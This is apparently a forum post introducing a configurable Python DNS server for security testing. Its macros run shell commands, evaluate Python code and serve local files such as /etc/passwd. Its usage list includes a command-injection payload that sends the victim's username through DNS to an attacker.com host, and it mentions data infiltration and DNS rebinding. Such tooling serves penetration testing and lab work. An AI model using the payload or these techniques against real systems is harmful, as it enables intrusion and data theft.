- Joined
- May 15, 2017
- Messages
- 986
- Likes
- 759
- Points
- 1,045
Simple, configurable "clone & run" DNS Server with multiple useful features
- Should work on Python 2 and 3
- names.db -> holds all custom records (see examples)
- Simple wildcards like *.example.com
- Catch unicode dns requests
- Custom actions aka macro:
- {{shellexec::dig google.com +short}} -> Execute shell command and respond with result
- {{eval::res = '1.1.1.%d' % random.randint(0,256)}} -> Evaluate your python code
- {{file::/etc/passwd}} -> Respond with localfile contents
- {{resolve}} -> Forward DNS request to local system DNS
- {{resolve::example.com}} -> Resolve example.com instead of original record
- {{echo}} -> Response back with peer address
- {{shellexec::echo %PEER% %QUERY%}} -> Use of variables
- Supported query types: A, CNAME, TXT
- Update names.db records without restart/reload with ./mpdns.py -e
Usage:
- Edit names.db with ./mpdns.py -e no restart required
- You need a light-weight simple dns-server solution for testing purposes (NOT PRODUCTION!)
- Test for various blind injection vulnerabilities in web applications (ex. /ping.php?ip=$(dig $(whoami).attacker.com))
- Easily infiltrate 65K of data in one TXT query
- DNS Rebinding
- Execute custom macro action on specific query (useful in malware-analysis lab environments)
- And lots more. It is highly customizable.
Limitations
- Due to UDP Datagram limit of 65535 bytes, DNS response is limited to approx ~65200 bytes
this limitation applies to TXT records which are splitted into chunks of 256 bytes until response reaches maximum allowed 65200b
therefore TXT record with macro {{file:localfile.txt}} is limited to 65200 bytes. - No support for nested wildcards test.*.example.com
- No support for custom DNS server resolver in {{resolve::example.com}} macro
- TTL always set to 0